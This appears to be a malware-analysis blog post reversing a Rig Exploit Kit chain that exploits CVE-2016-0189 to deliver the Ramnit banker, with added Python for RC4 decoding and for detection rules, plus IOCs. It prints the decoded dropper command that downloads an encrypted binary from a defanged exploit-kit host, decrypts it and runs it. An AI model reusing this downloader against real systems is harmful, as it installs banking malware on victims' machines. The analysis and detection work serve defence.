Let’s Learn: In-Depth Reversing Rig Exploit Kit’s VBScript Memory Corruption (CVE-2016-0189)

Goal: Reverse the latest exploit payload (CVE-2016-0189) from the Rig Exploit Kit (RigEK) and its chain leading to Ramnit banker based on the user-agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).
Source: Seamless gate leading to RigEK and Ramnit banker.
Tools: Fiddler, Internet Explorer, Firefox Web-Developer plugin



The observed URI parameters from the RigEK URI 81.177.140[.]137 (AS8342 RTCOMM-AS, RU) are:

  • NjA0MjE0/NDg3NDE4
  • mano
  • pano
  • gift
  • work
Background
While investigating the Rig EK, I observed it serving the CVE-2016-0189 exploit (VBScript Memory Corruption) to the user-agent string “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).” Previously, the same exploit kit was serving the CVE-2015-8651 Adobe Flash exploit to the same user-agent string.

Steps:
(1) Obtain the RigEK response from Fiddler.
(2) Debug the payload in the Web-Developer plugin by setting a breakpoint on bx or the return statement and copying the decoded payload.


(3) Observe the full decoded VBS code from RigEK’s CVE-2016-0189 function, which is almost an exact copy of the GitHub CVE-2016-0189 page (minus a few variable renames and ShellExecute being replaced with Run for obfuscation purposes). In this context, CVE-2016-0189 is also known as the “Scripting Engine Memory Corruption Vulnerability.”


(4) Finally, observe the Ramnit banker drop from the RigEK leveraging the exploit.

The CVE-2016-0189 exploit allows remote code execution and transfers control to the following decoded, beautified cmd command, which downloads an encoded binary, decrypts it, and runs the Ramnit banker:


cmd.exe / q / c cd / d "%tmp%" && echo

function O(l) {
    var w = "pow",
        j = 4 * 9;
    return A.round((A[w](j, l + 1) - A.random() * A[w](j, l))).toString(j)["slice"](1)
};

function V(k) {
    var y = a(e + "." + e + "Request.5.1");
    y.setProxy(n);
    y.open("GET", k(1), 1);
    y.Option(n) = k(2);
    y.send();
    y.WaitForResponse();
    if (200 == y.status) return _(y.responseText, k(n))
};

function _(k, e) {
    for (var l = 0, n, c = [], F = 5 + 5 * 50, S = String, q = [], b = 0; 256 ^ > b; b++) c[b] = b;
    for (b = 0; 256 ^ > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) ^ & F, n = c[b], c[b] = c[l], c[l] = n;
    for (var p = l = b = 0; p ^ < k.length; p++) b = b + 1 ^ & F, l = l + c[b] ^ & F, n = c[b], c[b] = c[l], c[l] = n, q.push(S.fromCharCode(k.charCodeAt(p) ^ ^ c[c[b] + c[l] ^ & F]));
    return q.join("")
};
try {
    u = WScript, o = "Object", A = Math, a = Function("b", "retu" + "rn u.Create" + o + "(b)");
    P = ("" + u).split(" ")[1], M = "indexOf", q = a(P + "ing.FileSystem" + o), m = u.Arguments, e = "WinHTTP", Z = "cmd", U = "DEleTefIle", j = a("W" + P + ".Shell"), s = a("ADODB.Stream"), x = O(8) + ".", p = "exe", n = 0, K = u[P + "FullName"], E = "." + p;
    s.Type = 3 - 1;
    s.Charset = "iso-8859-1";
    s.Open();
    try {
        v = V(m)
    } catch (W) {
        v = V(m)
    };
    d = v.charCodeAt(20 + 1 + v[M]("PE\x00\x00"));
    s.WriteText(v);
    h = "dll";
    if (31 ^ < d) {
        var z = 1;
        x += h
    } else x += p;
    s.savetofile(x, 2);
    s.Close();
    C = " /c ";
    Y = "gsvr32";
    z ^ & ^ & (x = "re" + Y + E + " /s " + x);
    j.run(Z + E + C + x, 0)
} catch (N) {};
q[U](K); > o32.tmp && start wscript //B //E:JScript o32.tmp "wexykukusw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)" "http://81.177.140[.]137/?NDg3NDE4&mano=[REDACTED]&pano=[REDACTED]&work=MzY0MzM0NjY="
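Two details of the stage above matter to an analyst holding a captured RigEK response: the _ function is plain RC4 keyed with the script's first argument (k(n) with n = 0, i.e. "wexykukusw"), and the branch on d decides whether the decoded file is written as <random>.dll and loaded through regsvr32 /s or as <random>.exe. The following Python is an added example written for this post, not code from the original page or from the payload; the PE image it decodes is constructed inline, and it reads the full COFF Characteristics field and tests IMAGE_FILE_DLL (0x2000) explicitly instead of the single-byte comparison the payload uses.

```python
import struct

# Constructed example; not the payload's code. IMAGE_FILE_DLL is the COFF
# Characteristics flag that marks a DLL image.
IMAGE_FILE_DLL = 0x2000


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream). The payload's `_` function is
    the same algorithm over single-byte characters, so it is its own inverse:
    applying it to the server response with the first script argument as key
    yields the dropped PE image."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def pe_characteristics(image: bytes) -> int:
    """COFF Characteristics of a PE image, or -1 when the MZ/PE headers are
    missing or truncated (the payload does no such validation and indexes
    from wherever "PE\\0\\0" first occurs)."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return -1
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew + 24 > len(image) or image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return -1
    # The COFF header follows the 4-byte signature; Characteristics is at +18.
    return struct.unpack_from("<H", image, e_lfanew + 22)[0]


def classify_dropped_image(key: bytes, response_body: bytes):
    """Decode a captured response and report which branch the payload takes:
    'dll' (written as <rand>.dll, loaded via regsvr32 /s), 'exe' (written as
    <rand>.exe) or 'not-pe'. Returns (label, decoded_bytes)."""
    plain = rc4(key, response_body)
    ch = pe_characteristics(plain)
    if ch == -1:
        return "not-pe", plain
    return ("dll" if ch & IMAGE_FILE_DLL else "exe"), plain


def build_fake_pe(characteristics: int) -> bytes:
    """Constructed 88-byte stand-in for a PE image: a DOS header whose
    e_lfanew points at a COFF header with the requested Characteristics.
    Not loadable; it only exercises the header parsing."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"PE\x00\x00" + struct.pack(
        "<HHIIIHH",
        0x014C,          # Machine: i386
        1,               # NumberOfSections
        0, 0, 0,         # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
        0xE0,            # SizeOfOptionalHeader for PE32
        characteristics,
    )
    return bytes(dos + coff)


if __name__ == "__main__":
    key = b"wexykukusw"  # the first argument passed to the script on the page
    body = rc4(key, build_fake_pe(0x2102))  # 0x2102: executable, 32-bit, DLL
    label, _image = classify_dropped_image(key, body)
    print(label)  # dll
```

Run against a real capture, the decoded bytes should be hashed and compared with the Ramnit SHA-1 listed in the IOCs; a "not-pe" result usually means the wrong argument was used as the key or the response was already a cached error page.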


The shortened relevant function is as follows (commented):

start wscript //B //E:JScript o32.tmp "wexykukusw" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)" "http://81.177.140[.]137/?NDg3NDE4&mano=[REDACTED]&pano=[REDACTED]&work=MzY0MzM0NjY="
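A detection-side view of the same chain, as an added example that is not part of the original post: a few constructed process-creation records in a Sysmon-like key=value layout are scanned for the three behaviours visible in the command above, cmd.exe echoing script text into a .tmp file and starting wscript, wscript run hidden with //B and forced to the JScript engine with //E:JScript on that .tmp file, and regsvr32 /s loading a bare 8-character base36 filename (the shape O(8) produces). The record layout, the benign look-alike records, the dropped file name and the rule names are assumptions for the example; the URL is kept defanged as on the page.

```python
import re

# Constructed process-creation records (a Sysmon-like key=value layout is
# assumed for the example). Records 1-3 mirror the chain on the page, with
# the URL kept defanged; records 4-5 are benign look-alikes that must not fire.
UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)"
URL = "http://81.177.140[.]137/?NDg3NDE4&mano=REDACTED&pano=REDACTED"
SAMPLE_LOG = [
    "ParentImage=C:\\Program Files\\Internet Explorer\\iexplore.exe "
    "Image=C:\\Windows\\System32\\cmd.exe "
    'CommandLine=cmd.exe /q /c cd /d "%tmp%" && echo function O(l) {...} '
    '> o32.tmp && start wscript //B //E:JScript o32.tmp "wexykukusw" '
    f'"{UA}" "{URL}"',
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "Image=C:\\Windows\\System32\\wscript.exe "
    f'CommandLine=wscript //B //E:JScript o32.tmp "wexykukusw" "{UA}" "{URL}"',
    "ParentImage=C:\\Windows\\System32\\wscript.exe "
    "Image=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd.exe /c regsvr32.exe /s k3j9x0qa.dll",  # k3j9x0qa: assumed O(8) output
    "ParentImage=C:\\Windows\\explorer.exe "
    "Image=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd.exe /c echo hello > log.txt",
    "ParentImage=C:\\Windows\\System32\\msiexec.exe "
    "Image=C:\\Windows\\System32\\regsvr32.exe "
    "CommandLine=regsvr32.exe /s C:\\Program Files\\Vendor\\plugin.dll",
]

RULES = {
    # cmd.exe writes script text into a .tmp file with echo, then starts wscript
    "cmd_echo_script_to_tmp_then_wscript": re.compile(
        r"cmd(?:\.exe)?\b.*\becho\b.*>\s*\S+\.tmp\s*&&\s*start\s+wscript", re.I),
    # wscript hidden (//B) and forced to the JScript engine (//E:JScript) on a .tmp file
    "wscript_jscript_engine_on_tmp_file": re.compile(
        r"wscript(?:\.exe)?\s+//B\s+//E:JScript\s+\S+\.tmp\b", re.I),
    # regsvr32 /s on a bare 8-char base36 name, the shape the payload's O(8) generates
    "regsvr32_silent_load_random_dll": re.compile(
        r"regsvr32(?:\.exe)?\s+/s\s+[0-9a-z]{8}\.dll\b", re.I),
}

RECORD_RX = re.compile(
    r"ParentImage=(?P<parent>.*?) Image=(?P<image>.*?) CommandLine=(?P<cmd>.*)$")
# The stage is invoked as: wscript //B //E:JScript <file> "<rc4 key>" "<user-agent>" "<url>"
WSCRIPT_ARGS_RX = re.compile(r'//E:JScript\s+(\S+)\s+"([^"]*)"\s+"([^"]*)"\s+"([^"]*)"')


def parse_record(record: str):
    """Split one record into parent, image and command line; None if malformed."""
    m = RECORD_RX.match(record)
    return None if m is None else m.groupdict()


def scan(records):
    """Run every rule over the CommandLine field of each record and return
    the records that matched, with the names of the rules that fired."""
    hits = []
    for number, record in enumerate(records, 1):
        fields = parse_record(record)
        if fields is None:
            continue
        matched = [name for name, rx in RULES.items() if rx.search(fields["cmd"])]
        if matched:
            hits.append({"line": number, "image": fields["image"], "rules": matched})
    return hits


def extract_wscript_iocs(cmdline: str):
    """Pull the script file, RC4 key, user-agent and download URL out of a
    wscript command line of the observed shape; None if it does not match."""
    m = WSCRIPT_ARGS_RX.search(cmdline)
    if m is None:
        return None
    script, key, user_agent, url = m.groups()
    return {"script": script, "rc4_key": key, "user_agent": user_agent, "url": url}


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(extract_wscript_iocs(parse_record(SAMPLE_LOG[1])["cmd"]))
```

The parent/child relationships in the records (iexplore.exe spawning cmd.exe, which spawns wscript.exe, which spawns cmd.exe and regsvr32.exe) are a second signal worth correlating on; the rules here deliberately key on the command lines alone so they keep working when the parent image is missing from the log source.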


Indicators of Compromise (IOCs):
08-15-2017 – RigEK server 81.177.140[.]137 (AS8342 RTCOMM-AS, RU)
08-15-2017 – RigEK exploit CVE-2016-0189 landing
SHA-1: 7993998d5f50bb7a3f8575fdfdb93f3386dbacde
08-15-2017 – Ramnit Banker 
SHA-1: 667d40d8c7c10f027ac57e91c509ddd56b8bc736

